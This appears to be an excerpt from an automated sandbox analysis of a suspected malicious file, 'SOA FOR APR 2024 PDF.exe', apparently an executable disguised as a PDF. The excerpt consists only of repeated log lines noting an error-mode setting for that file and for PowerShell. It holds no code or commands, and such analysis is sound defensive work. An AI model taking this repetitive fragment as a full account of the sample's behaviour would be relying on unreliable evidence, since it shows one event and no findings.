                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
